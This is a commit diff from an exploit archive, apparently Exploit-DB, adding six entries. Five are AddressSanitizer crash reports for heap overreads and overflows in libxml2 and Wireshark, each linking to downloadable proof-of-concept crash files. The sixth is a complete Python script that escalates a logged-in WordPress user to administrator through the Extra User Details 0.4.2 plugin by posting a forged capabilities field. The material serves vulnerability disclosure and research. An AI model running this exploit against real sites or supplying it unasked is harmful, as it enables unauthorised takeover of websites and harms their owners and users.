DB: 2016-02-25

6 new exploits
2016-02-25 05:01:57 +00:00 · 2016-02-25 05:01:57 +00:00 · 5f28d68611
commit 5f28d68611
parent 4ffbeca63b
7 changed files with 498 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35725,3 +35725,9 @@ id,file,description,date,author,platform,type,port
 39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
 39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0
 39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - CSRF Vulnerability",2016-02-23,"Julien Ahrens",json,webapps,8443
 39489,platforms/php/webapps/39489.py,"WordPress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80
 39490,platforms/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap-Based Buffer Overflow",2016-02-24,"Google Security Research",multiple,dos,0
 39491,platforms/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
 39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
 39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
 39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
--- a/platforms/linux/dos/39491.txt
+++ b/platforms/linux/dos/39491.txt
@ -0,0 +1,82 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=637
 The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
 --- cut ---
 ==25920==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010810 at pc 0x0000004a2f25 bp 0x7ffc81805ae0 sp 0x7ffc81805290
 READ of size 73661 at 0x631000010810 thread T0
    #0 0x4a2f24 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
    #1 0xd026b2 in xmlDictAddString libxml2-2.9.3/dict.c:285:5
    #2 0xd009e8 in xmlDictLookup libxml2-2.9.3/dict.c:926:11
    #3 0x806e4d in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2517:12
    #4 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
    #5 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
    #6 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
    #7 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
    #8 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
    #9 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
    #10 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
    #11 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
    #12 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
 0x631000010810 is located 0 bytes to the right of 65552-byte region [0x631000000800,0x631000010810)
 allocated by thread T0 here:
    #0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
    #1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
    #2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
    #3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
    #4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
    #5 0x8067f4 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2511:6
    #6 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
    #7 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
    #8 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
    #9 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
    #10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
    #11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
    #12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
    #13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
    #14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
 SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
 Shadow bytes around the buggy address:
  0x0c627fffa0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffa0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffa0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffa0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffa0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x0c627fffa100: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffa110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffa120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffa130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffa140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffa150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==25920==ABORTING
 --- cut ---
 The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Attached is an XML file which triggers the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39491.zip
--- a/platforms/linux/dos/39492.txt
+++ b/platforms/linux/dos/39492.txt
@ -0,0 +1,85 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=638
 The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
 --- cut ---
 ==4588==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000049e6 at pc 0x00000062b643 bp 0x7ffffa00f570 sp 0x7ffffa00f568
 READ of size 1 at 0x6290000049e6 thread T0
    #0 0x62b642 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9828:13
    #1 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
    #2 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
    #3 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
    #4 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
    #5 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
    #6 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
    #7 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
    #8 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
    #9 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
    #10 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
 0x6290000049e6 is located 2018 bytes to the right of 16388-byte region [0x629000000200,0x629000004204)
 allocated by thread T0 here:
    #0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
    #1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
    #2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
    #3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
    #4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
    #5 0x569d10 in xmlGROW libxml2-2.9.3/parser.c:2081:5
    #6 0x68208d in xmlParseNCNameComplex libxml2-2.9.3/parser.c:3499:6
    #7 0x68136d in xmlParseNCName libxml2-2.9.3/parser.c:3591:12
    #8 0x67d282 in xmlParseQName libxml2-2.9.3/parser.c:8859:9
    #9 0x61f04d in xmlParseStartTag2 libxml2-2.9.3/parser.c:9381:17
    #10 0x61a626 in xmlParseElement libxml2-2.9.3/parser.c:10129:16
    #11 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
    #12 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
    #13 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
    #14 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
    #15 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
    #16 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
    #17 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
    #18 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
    #19 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
 SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/parser.c:9828:13 in xmlParseEndTag2
 Shadow bytes around the buggy address:
  0x0c527fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff8900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff8910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff8920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
 =>0x0c527fff8930: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
  0x0c527fff8940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff8950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff8960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff8970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff8980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==4588==ABORTING
 --- cut ---
 The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Attached is an XML file which triggers the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39492.zip
--- a/platforms/linux/dos/39493.txt
+++ b/platforms/linux/dos/39493.txt
@ -0,0 +1,68 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=639
 The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
 --- cut ---
 ==4210==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000051ff at pc 0x000000533c8f bp 0x7ffdb38c4830 sp 0x7ffdb38c4828
 READ of size 1 at 0x6290000051ff thread T0
    #0 0x533c8e in xmlParserPrintFileContextInternal libxml2-2.9.3/error.c:192:6
    #1 0x54088a in xmlReportError libxml2-2.9.3/error.c:406:9
    #2 0x53884f in __xmlRaiseError libxml2-2.9.3/error.c:633:2
    #3 0x56f0ec in xmlFatalErr libxml2-2.9.3/parser.c:540:5
    #4 0x569c98 in xmlGROW libxml2-2.9.3/parser.c:2077:9
    #5 0x62bcb3 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9846:5
    #6 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
    #7 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
    #8 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
    #9 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
    #10 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
    #11 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
 0x6290000051ff is located 1 bytes to the left of 16384-byte region [0x629000005200,0x629000009200)
 allocated by thread T0 here:
    #0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x7f4df5219729  (/lib/x86_64-linux-gnu/libz.so.1+0xf729)
 SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/error.c:192:6 in xmlParserPrintFileContextInternal
 Shadow bytes around the buggy address:
  0x0c527fff89e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff89f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff8a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff8a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c527fff8a20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
 =>0x0c527fff8a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
  0x0c527fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c527fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c527fff8a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c527fff8a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c527fff8a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==4210==ABORTING
 --- cut ---
 The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758588. Attached is an XML file which triggers the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39493.zip
--- a/platforms/linux/dos/39494.txt
+++ b/platforms/linux/dos/39494.txt
@ -0,0 +1,78 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=636
 The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
 --- cut ---
 ==26202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001c900 at pc 0x0000008073f9 bp 0x7ffd791c7f90 sp 0x7ffd791c7f88
 READ of size 1 at 0x62100001c900 thread T0
    #0 0x8073f8 in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:439:6
    #1 0x80ee62 in htmlParseCharDataInternal libxml2-2.9.3/HTMLparser.c:3011:8
    #2 0x821b85 in htmlParseCharData libxml2-2.9.3/HTMLparser.c:3061:5
    #3 0x7df875 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4634:3
    #4 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
    #5 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
    #6 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
    #7 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
    #8 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
 0x62100001c900 is located 0 bytes to the right of 4096-byte region [0x62100001b900,0x62100001c900)
 allocated by thread T0 here:
    #0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0xa01a0c in xmlBufCreate libxml2-2.9.3/buf.c:137:32
    #2 0x550aca in xmlSwitchInputEncodingInt libxml2-2.9.3/parserInternals.c:1205:34
    #3 0x54f5ce in xmlSwitchToEncodingInt libxml2-2.9.3/parserInternals.c:1281:12
    #4 0x54f278 in xmlSwitchEncoding libxml2-2.9.3/parserInternals.c:1101:11
    #5 0x808eea in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:518:13
    #6 0x804a38 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2496:9
    #7 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
    #8 0x7ec211 in htmlParseDocTypeDecl libxml2-2.9.3/HTMLparser.c:3424:12
    #9 0x7debf4 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4585:3
    #10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
    #11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
    #12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
    #13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
    #14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
 SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/HTMLparser.c:439:6 in htmlCurrentChar
 Shadow bytes around the buggy address:
  0x0c427fffb8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c427fffb910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x0c427fffb920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c427fffb970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==26202==ABORTING
 --- cut ---
 The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758606. Attached is an XML file which triggers the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39494.zip
--- a/platforms/multiple/dos/39490.txt
+++ b/platforms/multiple/dos/39490.txt
@ -0,0 +1,66 @@
 Source: https://code.google.com/p/google-security-research/issues/detail?id=647
 The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
 --- cut ---
 ==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
 WRITE of size 1425 at 0x61b00001e95c thread T0
    #0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
    #1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
    #2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
    #3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
    #4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
    #5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
    #6 0x52c1df in main wireshark/tshark.c:2197:13
 0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
 allocated by thread T0 here:
    #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
    #2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
    #3 0x53214d in cf_open wireshark/tshark.c:4195:9
    #4 0x52bc7e in main wireshark/tshark.c:2188:9
 SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
 Shadow bytes around the buggy address:
  0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 =>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
  0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
 ==5869==ABORTING
 --- cut ---
 The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.
 Proof of Concept:
 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39490.zip
--- a/platforms/php/webapps/39489.py
+++ b/platforms/php/webapps/39489.py
@ -0,0 +1,113 @@
 """
 * Exploit Title: Extra User Details [Privilege Escalation]
 * Discovery Date: 2016-02-13
 * Exploit Author: Panagiotis Vagenas
 * Author Link: https://twitter.com/panVagenas
 * Vendor Homepage: http://vadimk.com/
 * Software Link: https://wordpress.org/plugins/extra-user-details/
 * Version: 0.4.2
 * Tested on: WordPress 4.4.2
 * Category: WebApps, WordPress
 Description
 -----------
 _Extra User Details_ plugin for WordPress suffers from a Privilege
 Escalation
 vulnerability.
 The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
 WordPress action. This function doesn't properly check user capabilities
 and
 updates all meta information passed to post data. The only condition is
 that
 the post variable name has the `eud` prefix which is striped before
 updating
 the values in DB.
 An attacker can exploit this misbehavior to update the
 {prefix}\_capabilities
 meta information to gain administrative privileges.
 PoC
 ---
 In the following PoC we assume that the database has the `wp` prefix, a
 very
 common scenario as this is the default WordPress value
 """
 # !/usr/bin/python3
 ################################################################################
 # Extra User Details Privilege Escalation Exploit
 #
 # Author: Panagiotis Vagenas <pan.vagenas>
 #
 # Dependencies: BeautifulSoup
 (http://www.crummy.com/software/BeautifulSoup/)
 ################################################################################
 import requests
 from bs4 import BeautifulSoup
 baseUrl = 'http://example.com'
 loginUrl = baseUrl + '/wp-login.php'
 profileUrl = baseUrl + '/wp-admin/profile.php'
 loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
 }
 s = requests.Session()
 r = s.post(loginUrl, loginPostData)
 if r.status_code != 200:
    print('Login error')
    exit(1)
 r = s.get(profileUrl)
 soup = BeautifulSoup(r.text, 'html.parser')
 f = soup.find('form', {'id': 'your-profile'})
 if not f:
    print('Error')
    exit(1)
 data = {
    'eudwp_capabilities[administrator]': 1,
 }
 for i in f.find_all('input'):
    if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
        data[i.attrs['name']] = i.attrs['value']
 r = s.post(profileUrl, data)
 if r.status_code == 200:
    print('Success')
 exit(0)
 """
 Solution
 --------
 Upgrade to v0.4.2.1
 Timeline
 --------
 1. **2016-02-13**: Vendor notified through wordpress.org support forums
 2. **2016-02-13**: Vendor notified through through the contact form in
 his website
 3. **2016-02-13**: Vendor responded and received details about this issue
 4. **2016-02-15**: Vendor released v0.4.2.1 which resolves this issue
 """